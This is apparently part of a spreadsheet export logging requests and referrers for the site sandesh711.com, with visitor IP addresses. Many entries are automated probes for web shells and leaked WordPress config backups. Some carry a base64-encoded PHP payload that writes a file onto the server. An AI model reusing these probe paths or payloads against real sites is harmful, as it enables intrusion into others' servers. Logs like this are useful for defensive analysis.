    <t>https://www.sandesh711.com/wp-content/plugins/root-file-manager/wp-file.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ph-file-manager/wp-file.php</t>
  </si>
  <si>
    <t>175.44.42.235</t>
  </si>
  <si>
    <t>http://www.tommysautomotivecare.com/</t>
  </si>
  <si>
    <t>85.215.114.81</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/about.php?auth_key</t>
  </si>
  <si>
    <t>165.22.56.152</t>
  </si>
  <si>
    <t>205.210.31.16</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/phplabware/internal_utilities/htmLawed/htmLawedTest.php</t>
  </si>
  <si>
    <t>104.248.136.64</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Katie%20Rose&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/phplabware/internal_utilities/htmLawed/htmLawedTest.php</t>
  </si>
  <si>
    <t>4.185.52.13</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/startklar-elmentor-forms-extwidgets/readme.txt</t>
  </si>
  <si>
    <t>205.210.31.153</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-term.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Sruthy%20Sithara</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-config-sample.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/checkbex.php</t>
  </si>
  <si>
    <t>13.36.238.7</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-content/wp-term.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-content/plugins/wp-term.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-ver.php</t>
  </si>
  <si>
    <t>163.116.195.96</t>
  </si>
  <si>
    <t>https://phonepe.lightning.force.com/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-term.php</t>
  </si>
  <si>
    <t>3.87.15.83</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/wp-term.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-term.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/wp-ver.php</t>
  </si>
  <si>
    <t>94.156.64.200</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-term.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-term.php</t>
  </si>
  <si>
    <t>110.89.4.179</t>
  </si>
  <si>
    <t>http://www.daorlar.shop/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/admin.php?520</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin.php?520</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/about.php?520</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/about.php?520</t>
  </si>
  <si>
    <t>185.16.39.176</t>
  </si>
  <si>
    <t>85.215.119.50</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/uploads/wp-config-sample.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-config-sample.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/checkbex.php</t>
  </si>
  <si>
    <t>91.92.253.87</t>
  </si>
  <si>
    <t>4.227.81.84</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/dummyyummy/wp-signup.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/dropdown.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/digital-download/new.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/aahana/json.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/travelscape/json.php</t>
  </si>
  <si>
    <t>82.165.61.230</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/atomlib.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/seoplugins/mar.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/seotheme/mar.php</t>
  </si>
  <si>
    <t>176.77.159.61</t>
  </si>
  <si>
    <t>198.235.24.27</t>
  </si>
  <si>
    <t>4.236.121.98</t>
  </si>
  <si>
    <t>175.44.42.185</t>
  </si>
  <si>
    <t>85.209.133.6</t>
  </si>
  <si>
    <t>85.215.99.203</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/about.php</t>
  </si>
  <si>
    <t>138.199.48.4</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.git/config</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/jetpack/_inc/jetpack-admin.js</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/elementor/assets/js/notes.js</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/contact-form-7/admin/js/scripts.js</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/akismet/_inc/akismet.js</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/woocommerce/assets/js/admin/users.js</t>
  </si>
  <si>
    <t>85.209.133.39</t>
  </si>
  <si>
    <t>183.82.119.54</t>
  </si>
  <si>
    <t>45.94.31.205</t>
  </si>
  <si>
    <t>205.210.31.40</t>
  </si>
  <si>
    <t>81.17.122.47</t>
  </si>
  <si>
    <t>175.44.42.143</t>
  </si>
  <si>
    <t>http://www.urbanblog.shop/</t>
  </si>
  <si>
    <t>91.92.243.105</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/input.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/lol.php</t>
  </si>
  <si>
    <t>194.26.192.59</t>
  </si>
  <si>
    <t>193.26.115.185</t>
  </si>
  <si>
    <t>141.98.11.144</t>
  </si>
  <si>
    <t>154.223.18.236</t>
  </si>
  <si>
    <t>91.92.242.55</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/uycqlzxn.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/siqrmhsc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>103.25.248.233</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Shivaleeka%20Oberoi&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>81.0.246.72</t>
  </si>
  <si>
    <t>45.88.90.199</t>
  </si>
  <si>
    <t>158.220.107.208</t>
  </si>
  <si>
    <t>66.249.80.234</t>
  </si>
  <si>
    <t>103.242.23.181</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/splitsvilla/</t>
  </si>
  <si>
    <t>https://search.brave.com/</t>
  </si>
  <si>
    <t>4.227.9.174</t>
  </si>
  <si>
    <t>154.223.19.68</t>
  </si>
  <si>
    <t>158.220.80.95</t>
  </si>
  <si>
    <t>103.183.46.206</t>
  </si>
  <si>
    <t>143.110.228.185</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NvbWNqLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>91.92.241.52</t>
  </si>
  <si>
    <t>157.49.248.197</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Priyanka%20Kumar&amp;date=2023-05-21</t>
  </si>
  <si>
    <t>120.33.231.215</t>
  </si>
  <si>
    <t>http://www.epslarhome.shop/</t>
  </si>
  <si>
    <t>45.128.96.201</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-aa.php</t>
  </si>
  <si>
    <t>152.58.218.82</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Rambha%20Ranjith%20Kallingal</t>
  </si>
  <si>
    <t>123.6.49.41</t>
  </si>
  <si>
    <t>51.15.17.105</t>
  </si>
  <si>
    <t>45.227.254.24</t>
  </si>
  <si>
    <t>77.68.77.47</t>
  </si>
  <si>
    <t>176.58.112.239</t>
  </si>
  <si>
    <t>103.153.105.33</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Rambha%20Ranjith%20Kallingal&amp;date=2023-12-29</t>
  </si>
  <si>
    <t>45.80.158.96</t>
  </si>
  <si>
    <t>4.242.221.41</t>
  </si>
  <si>
    <t>194.195.113.252</t>
  </si>
  <si>
    <t>45.128.96.212</t>
  </si>
  <si>
    <t>120.33.231.240</t>
  </si>
  <si>
    <t>http://www.graceonline.shop/</t>
  </si>
  <si>
    <t>113.211.139.223</t>
  </si>
  <si>
    <t>167.86.110.100</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/linkpreview/up.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/seoplugins/db.php?u</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/linkpreview/up.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/seoplugins/db.php?u</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/bute/lang.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/work-list/lang.php</t>
  </si>
  <si>
    <t>44.234.153.186</t>
  </si>
  <si>
    <t>http://68.178.148.82</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.wp-config.swn</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-config.swn</t>
  </si>
  <si>
    <t>64.23.202.49</t>
  </si>
  <si>
    <t>223.187.126.116</t>
  </si>
  <si>
    <t>91.92.242.154</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/core/include.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-config.swo</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.wp-config.swo</t>
  </si>
  <si>
    <t>89.36.78.114</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-config.swp</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.wp-config.swp</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.wp-config.old</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-config.old</t>
  </si>
  <si>
    <t>162.221.206.110</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.wp-config.save</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-config.save</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/shell/about.php</t>
  </si>
  <si>
    <t>94.156.67.39</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rkfirtje.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wvmydsnp.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.wp-config~</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-config~</t>
  </si>
  <si>
    <t>3.88.220.62</t>
  </si>
  <si>
    <t>106.77.190.83</t>
  </si>
  <si>
    <t>91.92.244.229</t>
  </si>
  <si>
    <t>205.210.31.167</t>
  </si>
  <si>
    <t>94.156.69.118</t>
  </si>
  <si>
    <t>207.231.107.135</t>
  </si>
  <si>
    <t>218.214.218.246</t>
  </si>
  <si>
    <t>https://www.google.co.uk/</t>
  </si>
  <si>
    <t>49.207.229.178</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/www.sandesh711.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1</t>
  </si>
  <si>
    <t>175.44.42.189</t>
  </si>
  <si>
    <t>http://www.davilaonline.shop/</t>
  </si>
  <si>
    <t>165.232.186.200</t>
  </si>
  <si>
    <t>91.92.246.109</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/fpliresi.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/zqhwhitd.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>91.92.255.7</t>
  </si>
  <si>
    <t>175.44.42.168</t>
  </si>
  <si>
    <t>173.249.52.120</t>
  </si>
  <si>
    <t>91.92.255.47</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bigg-boss/unveiling-the-charismatic-journey-of-ayesha-khan-from-bigg-boss-contestant-to-influential-personality/</t>
  </si>
  <si>
    <t>157.41.250.177</t>
  </si>
  <si>
    <t>87.236.20.200</t>
  </si>
  <si>
    <t>79.110.62.2</t>
  </si>
  <si>
    <t>86.48.23.151</t>
  </si>
  <si>
    <t>89.117.148.34</t>
  </si>
  <si>
    <t>89.117.148.36</t>
  </si>
  <si>
    <t>89.117.148.38</t>
  </si>
  <si>
    <t>205.210.31.29</t>
  </si>
  <si>
    <t>94.156.68.172</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/nf_tracking.php</t>
  </si>
  <si>
    <t>175.44.42.112</t>
  </si>
  <si>
    <t>http://miae.ecronline.shop/</t>
  </si>
  <si>
    <t>173.249.52.101</t>
  </si>
  <si>
    <t>51.145.46.39</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/defaults.php</t>
  </si>
  <si>
    <t>209.151.149.32</t>
  </si>
  <si>
    <t>157.47.61.115</t>
  </si>
  <si>
    <t>178.159.37.56</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/1743/</t>
  </si>
  <si>
    <t>https://flotsgaiter.com</t>
  </si>
  <si>
    <t>173.212.237.111</t>
  </si>
  <si>
    <t>175.44.42.49</t>
  </si>
  <si>
    <t>http://www.jearyblog.online/</t>
  </si>
  <si>
    <t>185.130.226.113</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/uncategorized/must-watch-movie-of-sukrutha-wagle-jatta-%e0%b2%b8%e0%b3%81%e0%b2%95%e0%b3%83%e0%b2%a4%e0%b2%be-%e0%b2%b5%e0%b2%be%e0%b2%97%e0%b3%8d%e0%b2%b2%e0%b3%86-%e0%b2%9c%e0%b2%9f%e0%b3%8d%e0%b2%9f%e0%b2%be/?unapproved=97&amp;moderation-hash=2201da08d5d3baa06fedbeba6cd0943</t>
  </si>
  <si>
    <t>https://niceneloulu.com</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/uncategorized/must-watch-movie-of-sukrutha-wagle-jatta-%e0%b2%b8%e0%b3%81%e0%b2%95%e0%b3%83%e0%b2%a4%e0%b2%be-%e0%b2%b5%e0%b2%be%e0%b2%97%e0%b3%8d%e0%b2%b2%e0%b3%86-%e0%b2%9c%e0%b2%9f%e0%b3%8d%e0%b2%9f%e0%b2%be/</t>
  </si>
  <si>
    <t>152.58.232.4</t>
  </si>
  <si>
    <t>https://www.google.co.in/search?q=Priyanka+Kumar+hot&amp;client=ucweb-b&amp;sca_esv=d5df9f5ca7841720&amp;channel=sb&amp;tbm=isch&amp;source=lnms&amp;sa=X&amp;ved=0ahUKEwiv45zjyv2EAxXI-TgGHTY6ClcQ_AUIBigB&amp;biw=384&amp;bih=686</t>
  </si>
  <si>
    <t>117.252.184.242</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Nila%20Nambiar</t>
  </si>
  <si>
    <t>49.206.38.109</t>
  </si>
  <si>
    <t>175.44.42.84</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/2021/04/Image-1-768x960.jpg?v=1619065175</t>
  </si>
  <si>
    <t>https://segudanggambar791.blogspot.com/</t>
  </si>
  <si>
    <t>106.221.182.119</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Malavika%20Mohanan</t>
  </si>
  <si>
    <t>4.223.90.107</t>
  </si>
  <si>
    <t>168.149.184.220</t>
  </si>
  <si>
    <t>45.135.237.166</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xx.php</t>
  </si>
  <si>
    <t>175.44.42.191</t>
  </si>
  <si>
    <t>http://www.sjmsw.net/</t>
  </si>
  <si>
    <t>177.38.204.105</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/daily-updates/</t>
  </si>
  <si>
    <t>https://webmii.com/</t>
  </si>
  <si>
    <t>52.2.74.251</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sellers.json</t>
  </si>
  <si>
    <t>https://talkinfight.com/sellers.json</t>
  </si>
  <si>
    <t>91.92.246.171</t>
  </si>
  <si>
    <t>182.75.21.118</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/top.php?action=door123</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wzy.php?action=door123</t>
  </si>
  <si>
    <t>https://theforceguide.com/sellers.json</t>
  </si>
  <si>
    <t>66.94.104.160</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/seotheme/mar.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/seoplugins/mar.php</t>
  </si>
  <si>
    <t>198.235.24.58</t>
  </si>
  <si>
    <t>2.57.121.251</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/templates/beez3/</t>
  </si>
  <si>
    <t>www.bing.com</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/config.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfa.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/test.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/a.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/z.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/x.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/fox.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/upload.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/up.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/shell.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wso.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xleet.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/olux.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/shells.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?3x=3x</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ubh/up.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/controller/extension/extension/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/controller/extension/extension/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/controller/extension/extension/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sites/default/files/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sites/default/files/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sites/default/files/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/templates/beez3/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/templates/beez3/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/templates/beez3/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cgialfa</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfacgiapi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ALFA_DATA</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/error.php?phpshells</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-backup-sql-302.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/system_log.php?bala=up</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/outcms.php?up</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/defau11.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xindex.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/archives.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/db-cache.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/gank.php.PhP</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-plugins.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wpconfig.bak.php?act=sf</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/legion.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/config.bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/config.bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/mu-plugins/db-safe-mode.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/backup_index.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-booking.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/moduless.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/css.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/defau1t.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/css/css.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/images/css.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/export.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/export.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/media-admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-signin.php?dizo&amp;ping</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ups.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/beence.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp_wrong_datlib.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/doc.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qindex.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xmlrpcs.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xmrlpc.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/old-index.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/lock360.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/radio.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/mu-plugins-old/?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/1index.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/s_ne.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/s_e.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/style.php</t>
  </si>
  <si>
    <t>163.5.210.83</t>
  </si>
  <si>
    <t>95.111.244.68</t>
  </si>
  <si>
    <t>185.241.208.118</t>
  </si>
  <si>
    <t>91.92.250.140</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/about.php?520</t>
  </si>
  <si>
    <t>157.49.227.196</t>
  </si>
  <si>
    <t>117.221.221.181</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/about.php?auth_key</t>
  </si>
  <si>
    <t>120.33.230.190</t>
  </si>
  <si>
    <t>http://www.jackonline.store/</t>
  </si>
  <si>
    <t>91.92.240.125</t>
  </si>
  <si>
    <t>91.92.246.2</t>
  </si>
  <si>
    <t>45.135.237.183</t>
  </si>
  <si>
    <t>85.215.119.34</t>
  </si>
  <si>
    <t>117.232.79.219</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xleet-shell.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-class.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/shell20211028.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/sid/sidwso.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bala.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wso112233.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wso112233.php</t>
  </si>
  <si>
    <t>192.178.10.8</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/pwnd/pwnd.php</t>
  </si>
  <si>
    <t>188.166.210.23</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-head.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/M1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/finley/min.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/fm1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xxl.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/press/wp-class.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/yyobang/mar.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa21ub3VtLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>152.42.160.234</t>
  </si>
  <si>
    <t>152.42.184.86</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/css/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/st.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/nf_tracking.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NxZ3dpLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>206.189.41.216</t>
  </si>
  <si>
    <t>198.235.24.60</t>
  </si>
  <si>
    <t>167.172.72.239</t>
  </si>
  <si>
    <t>167.172.74.123</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3FubXV0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>91.92.247.204</t>
  </si>
  <si>
    <t>128.199.173.216</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/js/tinymce/plugins/wordpress/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/js/tinymce/plugins/media/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/customize/smooth_wp.php%7CF5d4JH6m1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/js/tinymce/plugins/fullscreen/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/blocks/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>123.6.49.47</t>
  </si>
  <si>
    <t>123.6.49.50</t>
  </si>
  <si>
    <t>205.210.31.9</t>
  </si>
  <si>
    <t>173.249.29.208</t>
  </si>
  <si>
    <t>143.198.220.192</t>
  </si>
  <si>
    <t>139.59.250.1</t>
  </si>
  <si>
    <t>173.249.52.122</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.well-known/pki-validation/Newsupway.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/pki-validation/Newsupway.php</t>
  </si>
  <si>
    <t>94.237.111.60</t>
  </si>
  <si>
    <t>165.232.169.199</t>
  </si>
  <si>
    <t>91.92.245.173</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/travelscape/json.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/travel/issue.php</t>
  </si>
  <si>
